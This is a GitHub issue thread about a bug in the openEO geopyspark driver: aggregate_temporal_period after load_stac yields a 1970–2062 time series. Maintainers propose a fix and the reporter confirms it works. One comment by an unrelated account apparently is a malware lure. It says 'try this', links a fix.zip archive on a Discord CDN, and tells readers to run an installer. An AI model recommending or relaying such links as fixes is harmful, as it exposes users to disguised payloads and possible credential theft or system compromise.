### ISSUE TITLE
`aggregate_temporal_period` after `load_stac` gives unexpected results

### ISSUE THREAD

**Issue by VincentVerelst** [Open-EO/openeo-geopyspark-driver#855]
In job j-240902ff18204cc38e0256e8872702b9 on the Terrascope backend, I load in a STAC collection. The STAC collection can be found in the attachment. The temporal extent ranges from 2016 to 2018. I then apply median compositing using the `aggregate_temporal_period` process. Finally, I use `aggregate_spatial` to extract some points to geoparquet format. 

The resulting geoparquet file unexpectedly contains a timeseries ranging from 1970-2062 in monthly timesteps. Due to this, the batch job took a long time to run and used many credits.

Without applying `aggregate_temporal_period`, the timeseries in the resulting geoparquet varies from 2016 to 2018, as expected. This leads me to believe that the problem lies within the `aggregate_temporal_period` process being used after `load_stac`. 

[collection.json](https://github.com/user-attachments/files/16849190/collection.json)

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by VincentVerelst** [comment]
Explicitly setting a `temoral_extent` in `load_stac` fixes this issue.

**Comment by jdries** [comment]
Proposed fix: fall back to temporal extent of stac collection when no extent is provided in load_stac.

**Comment by bossie** [comment]
@VincentVerelst the fix for #852 should also cover this; please retry on openeo-dev.

**Comment by VincentVerelst** [comment]
@bossie, sorry forgot to comment on this one: confirmed that this one is fixed as well!
